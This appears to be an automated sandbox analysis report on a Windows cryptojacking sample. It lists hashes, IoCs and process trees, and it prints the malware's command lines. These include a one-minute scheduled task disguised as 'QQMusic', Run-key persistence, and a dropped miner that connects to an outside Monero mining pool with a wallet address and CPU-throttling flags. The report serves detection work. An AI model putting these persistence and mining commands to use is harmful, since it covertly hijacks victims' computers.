0e1d157645c2b6516483094c63578c8e049a2dd443be190c5d3d1601d87e35ee

Analysis

max time kernel
151s
max time network
151s
platform
windows7_x64
resource
win7-en-20211208
submitted
09-12-2021 17:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
Size

9.6MB
MD5

b90d8102c92b66276444c0862898b392
SHA1

7548be7467ae40ab855bdd721887bf4c59c7b1c9
SHA256

028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a
SHA512

ef30f3f601d093971eb64f7afb20c73b112c4e5275b476fc2b78257757020163c6373a93d6e972c12adce59615e4b10bcd0d8d713826119d9112eb1bee42b9fb

Score

9^/10

miner persistence upx

Malware Config

Signatures

Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
miner

Executes dropped EXE 18 IoCs

Processes:

spreadGtuvwx.exespreadGtuvwx.exespreadGtuvwx.exe028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exespreadGtuvwx.exespreadGtuvwx.exespreadGtuvwx.exespreadGtuvwx.exespreadGtuvwx.exespreadGtuvwx.exe028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exespreadGtuvwx.exespreadGtuvwx.exespreadGtuvwx.exespreadGtuvwx.exespreadGtuvwx.exespreadGtuvwx.exe028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe

pid	process
1168	spreadGtuvwx.exe
1176	spreadGtuvwx.exe
1772	spreadGtuvwx.exe
556	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1132	spreadGtuvwx.exe
1168	spreadGtuvwx.exe
1468	spreadGtuvwx.exe
1640	spreadGtuvwx.exe
1356	spreadGtuvwx.exe
1548	spreadGtuvwx.exe
572	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
816	spreadGtuvwx.exe
1928	spreadGtuvwx.exe
1180	spreadGtuvwx.exe
1496	spreadGtuvwx.exe
1484	spreadGtuvwx.exe
1696	spreadGtuvwx.exe
592	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe

UPX packed file 16 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\ProgramData\spreadGtuvwx.exe	upx
C:\ProgramData\spreadGtuvwx.exe	upx
C:\ProgramData\spreadGtuvwx.exe	upx
C:\ProgramData\spreadGtuvwx.exe	upx
C:\ProgramData\spreadGtuvwx.exe	upx
C:\ProgramData\spreadGtuvwx.exe	upx
C:\ProgramData\spreadGtuvwx.exe	upx
C:\ProgramData\spreadGtuvwx.exe	upx
C:\ProgramData\spreadGtuvwx.exe	upx
C:\ProgramData\spreadGtuvwx.exe	upx
C:\ProgramData\spreadGtuvwx.exe	upx
C:\ProgramData\spreadGtuvwx.exe	upx
C:\ProgramData\spreadGtuvwx.exe	upx
C:\ProgramData\spreadGtuvwx.exe	upx
C:\ProgramData\spreadGtuvwx.exe	upx
C:\ProgramData\spreadGtuvwx.exe	upx

Loads dropped DLL 1 IoCs

Processes:

028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe

pid process

1648 028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\QQMusic = "C:\\Users\\Admin\\AppData\\Local\\Temp\\028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe"	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\QQMusic = "C:\\Users\\Admin\\AppData\\Local\\Temp\\028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe"	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1432 schtasks.exe

pid	process
1432	schtasks.exe

Gathers network information 2 TTPs 20 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

Processes:

ipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exe

pid	process
472	ipconfig.exe
1932	ipconfig.exe
1484	ipconfig.exe
1420	ipconfig.exe
1396	ipconfig.exe
796	ipconfig.exe
812	ipconfig.exe
1016	ipconfig.exe
1060	ipconfig.exe
1824	ipconfig.exe
1720	ipconfig.exe
536	ipconfig.exe
1760	ipconfig.exe
1596	ipconfig.exe
1516	ipconfig.exe
1744	ipconfig.exe
1356	ipconfig.exe
1980	ipconfig.exe
1516	ipconfig.exe
564	ipconfig.exe

Kills process with taskkill 8 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

1204 taskkill.exe
1272 taskkill.exe
1624 taskkill.exe
1412 taskkill.exe
1040 taskkill.exe
1656 taskkill.exe
1204 taskkill.exe
1976 taskkill.exe

pid	process
1204	taskkill.exe
1272	taskkill.exe
1624	taskkill.exe
1412	taskkill.exe
1040	taskkill.exe
1656	taskkill.exe
1204	taskkill.exe
1976	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe

pid	process
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe

pid process

1648 028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe

Suspicious use of AdjustPrivilegeToken 39 IoCs

Processes:

028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exetaskkill.exetaskkill.exespreadGtuvwx.exespreadGtuvwx.exetaskkill.exespreadGtuvwx.exespreadGtuvwx.exetaskkill.exespreadGtuvwx.exetaskkill.exespreadGtuvwx.exetaskkill.exespreadGtuvwx.exespreadGtuvwx.exetaskkill.exespreadGtuvwx.exespreadGtuvwx.exetaskkill.exespreadGtuvwx.exe

description	pid	process
Token: SeDebugPrivilege	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
Token: SeBackupPrivilege	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
Token: SeSecurityPrivilege	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
Token: SeSecurityPrivilege	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
Token: SeBackupPrivilege	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
Token: SeSecurityPrivilege	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
Token: SeBackupPrivilege	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
Token: SeSecurityPrivilege	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
Token: SeBackupPrivilege	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
Token: SeSecurityPrivilege	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
Token: SeDebugPrivilege	1204	taskkill.exe
Token: SeDebugPrivilege	1976	taskkill.exe
Token: SeLockMemoryPrivilege	1168	spreadGtuvwx.exe
Token: SeLockMemoryPrivilege	1772	spreadGtuvwx.exe
Token: SeLockMemoryPrivilege	1772	spreadGtuvwx.exe
Token: SeDebugPrivilege	1204	taskkill.exe
Token: SeLockMemoryPrivilege	1132	spreadGtuvwx.exe
Token: SeLockMemoryPrivilege	1132	spreadGtuvwx.exe
Token: SeLockMemoryPrivilege	1168	spreadGtuvwx.exe
Token: SeLockMemoryPrivilege	1168	spreadGtuvwx.exe
Token: SeDebugPrivilege	1272	taskkill.exe
Token: SeLockMemoryPrivilege	1640	spreadGtuvwx.exe
Token: SeLockMemoryPrivilege	1640	spreadGtuvwx.exe
Token: SeDebugPrivilege	1624	taskkill.exe
Token: SeLockMemoryPrivilege	1548	spreadGtuvwx.exe
Token: SeLockMemoryPrivilege	1548	spreadGtuvwx.exe
Token: SeDebugPrivilege	1412	taskkill.exe
Token: SeLockMemoryPrivilege	816	spreadGtuvwx.exe
Token: SeLockMemoryPrivilege	816	spreadGtuvwx.exe
Token: SeLockMemoryPrivilege	1928	spreadGtuvwx.exe
Token: SeLockMemoryPrivilege	1928	spreadGtuvwx.exe
Token: SeDebugPrivilege	1040	taskkill.exe
Token: SeLockMemoryPrivilege	1180	spreadGtuvwx.exe
Token: SeLockMemoryPrivilege	1180	spreadGtuvwx.exe
Token: SeLockMemoryPrivilege	1496	spreadGtuvwx.exe
Token: SeLockMemoryPrivilege	1496	spreadGtuvwx.exe
Token: SeDebugPrivilege	1656	taskkill.exe
Token: SeLockMemoryPrivilege	1696	spreadGtuvwx.exe
Token: SeLockMemoryPrivilege	1696	spreadGtuvwx.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1648 wrote to memory of 1636	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	cmd.exe
PID 1648 wrote to memory of 1636	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	cmd.exe
PID 1648 wrote to memory of 1636	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	cmd.exe
PID 1648 wrote to memory of 1636	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	cmd.exe
PID 1648 wrote to memory of 952	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	cmd.exe
PID 1648 wrote to memory of 952	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	cmd.exe
PID 1648 wrote to memory of 952	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	cmd.exe
PID 1648 wrote to memory of 952	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	cmd.exe
PID 1636 wrote to memory of 1432	1636	cmd.exe	schtasks.exe
PID 1636 wrote to memory of 1432	1636	cmd.exe	schtasks.exe
PID 1636 wrote to memory of 1432	1636	cmd.exe	schtasks.exe
PID 1636 wrote to memory of 1432	1636	cmd.exe	schtasks.exe
PID 952 wrote to memory of 1420	952	cmd.exe	ipconfig.exe
PID 952 wrote to memory of 1420	952	cmd.exe	ipconfig.exe
PID 952 wrote to memory of 1420	952	cmd.exe	ipconfig.exe
PID 952 wrote to memory of 1420	952	cmd.exe	ipconfig.exe
PID 1648 wrote to memory of 1412	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	cmd.exe
PID 1648 wrote to memory of 1412	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	cmd.exe
PID 1648 wrote to memory of 1412	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	cmd.exe
PID 1648 wrote to memory of 1412	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	cmd.exe
PID 1412 wrote to memory of 1204	1412	cmd.exe	taskkill.exe
PID 1412 wrote to memory of 1204	1412	cmd.exe	taskkill.exe
PID 1412 wrote to memory of 1204	1412	cmd.exe	taskkill.exe
PID 1412 wrote to memory of 1204	1412	cmd.exe	taskkill.exe
PID 1648 wrote to memory of 1808	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	cmd.exe
PID 1648 wrote to memory of 1808	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	cmd.exe
PID 1648 wrote to memory of 1808	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	cmd.exe
PID 1648 wrote to memory of 1808	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	cmd.exe
PID 1808 wrote to memory of 1976	1808	cmd.exe	taskkill.exe
PID 1808 wrote to memory of 1976	1808	cmd.exe	taskkill.exe
PID 1808 wrote to memory of 1976	1808	cmd.exe	taskkill.exe
PID 1808 wrote to memory of 1976	1808	cmd.exe	taskkill.exe
PID 1648 wrote to memory of 1168	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	spreadGtuvwx.exe
PID 1648 wrote to memory of 1168	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	spreadGtuvwx.exe
PID 1648 wrote to memory of 1168	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	spreadGtuvwx.exe
PID 1648 wrote to memory of 1168	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	spreadGtuvwx.exe
PID 1648 wrote to memory of 1176	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	spreadGtuvwx.exe
PID 1648 wrote to memory of 1176	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	spreadGtuvwx.exe
PID 1648 wrote to memory of 1176	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	spreadGtuvwx.exe
PID 1648 wrote to memory of 1176	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	spreadGtuvwx.exe
PID 1648 wrote to memory of 1772	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	spreadGtuvwx.exe
PID 1648 wrote to memory of 1772	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	spreadGtuvwx.exe
PID 1648 wrote to memory of 1772	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	spreadGtuvwx.exe
PID 1648 wrote to memory of 1772	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	spreadGtuvwx.exe
PID 1648 wrote to memory of 1104	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	cmd.exe
PID 1648 wrote to memory of 1104	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	cmd.exe
PID 1648 wrote to memory of 1104	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	cmd.exe
PID 1648 wrote to memory of 1104	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	cmd.exe
PID 1104 wrote to memory of 1760	1104	cmd.exe	ipconfig.exe
PID 1104 wrote to memory of 1760	1104	cmd.exe	ipconfig.exe
PID 1104 wrote to memory of 1760	1104	cmd.exe	ipconfig.exe
PID 1104 wrote to memory of 1760	1104	cmd.exe	ipconfig.exe
PID 1648 wrote to memory of 1536	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	cmd.exe
PID 1648 wrote to memory of 1536	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	cmd.exe
PID 1648 wrote to memory of 1536	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	cmd.exe
PID 1648 wrote to memory of 1536	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	cmd.exe
PID 1536 wrote to memory of 1980	1536	cmd.exe	ipconfig.exe
PID 1536 wrote to memory of 1980	1536	cmd.exe	ipconfig.exe
PID 1536 wrote to memory of 1980	1536	cmd.exe	ipconfig.exe
PID 1536 wrote to memory of 1980	1536	cmd.exe	ipconfig.exe
PID 1648 wrote to memory of 1608	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	cmd.exe
PID 1648 wrote to memory of 1608	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	cmd.exe
PID 1648 wrote to memory of 1608	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	cmd.exe
PID 1648 wrote to memory of 1608	1648	028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe
"C:\Users\Admin\AppData\Local\Temp\028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1648

C:\Windows\SysWOW64\cmd.exe
cmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\AppData\Local\Temp\028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe /F
2⤵
- Suspicious use of WriteProcessMemory
PID:1636

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\AppData\Local\Temp\028a3c4ac5d54628ff50659c08e00c776b66ca92d60e378dbe5d8e742af5840a.exe /F
3⤵
- Creates scheduled task(s)
PID:1432

C:\Windows\SysWOW64\cmd.exe
cmd /c ipconfig /flushdns
2⤵
- Suspicious use of WriteProcessMemory
PID:952

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /flushdns
3⤵
- Gathers network information
PID:1420

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im spreadGtuvwx.exe&&exit
2⤵
- Suspicious use of WriteProcessMemory
PID:1412

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im spreadGtuvwx.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1204

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im spreadGtuvwx.exe&&exit
2⤵
- Suspicious use of WriteProcessMemory
PID:1808

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im spreadGtuvwx.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1976

C:\ProgramData\spreadGtuvwx.exe
C:\ProgramData\spreadGtuvwx.exe -o stratum+tcp://gulf.moneroocean.stream:8080 -a cn/r -u 4AfAd5hsdMWbuNyGbFJVZjcMLeKHvrXnT155DWh8qGkYRPbVGKBT9q1Z5gcFXqmwUuh2Kh6t2sTnHXPysYrGf2m9KqBwz9e -p X --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1168

C:\ProgramData\spreadGtuvwx.exe
C:\ProgramData\spreadGtuvwx.exe -o stratum+tcp://gulf.moneroocean.stream:8080 -a cn/r -u 4AfAd5hsdMWbuNyGbFJVZjcMLeKHvrXnT155DWh8qGkYRPbVGKBT9q1Z5gcFXqmwUuh2Kh6t2sTnHXPysYrGf2m9KqBwz9e -p X --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
2⤵
- Executes dropped EXE
PID:1176

C:\ProgramData\spreadGtuvwx.exe
C:\ProgramData\spreadGtuvwx.exe -o stratum+tcp://gulf.moneroocean.stream:8080 -a cn/r -u 4AfAd5hsdMWbuNyGbFJVZjcMLeKHvrXnT155DWh8qGkYRPbVGKBT9q1Z5gcFXqmwUuh2Kh6t2sTnHXPysYrGf2m9KqBwz9e -p X --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1772

C:\Windows\SysWOW64\cmd.exe
cmd /c ipconfig /flushdns
2⤵
- Suspicious use of WriteProcessMemory
PID:1104

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /flushdns
3⤵
- Gathers network information
PID:1760

C:\Windows\SysWOW64\cmd.exe
cmd /c ipconfig /flushdns
2⤵
- Suspicious use of WriteProcessMemory
PID:1536

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /flushdns
3⤵
- Gathers network information
PID:1980

C:\Windows\SysWOW64\cmd.exe
cmd /c ipconfig /flushdns
2⤵
PID:1608

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /flushdns
3⤵
- Gathers network information
PID:1396

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im spreadGtuvwx.exe&&exit
2⤵
PID:1224

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im spreadGtuvwx.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1204

C:\ProgramData\spreadGtuvwx.exe
C:\ProgramData\spreadGtuvwx.exe -o stratum+tcp://gulf.moneroocean.stream:8080 -a cn/r -u 4AfAd5hsdMWbuNyGbFJVZjcMLeKHvrXnT155DWh8qGkYRPbVGKBT9q1Z5gcFXqmwUuh2Kh6t2sTnHXPysYrGf2m9KqBwz9e -p X --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1132

C:\ProgramData\spreadGtuvwx.exe
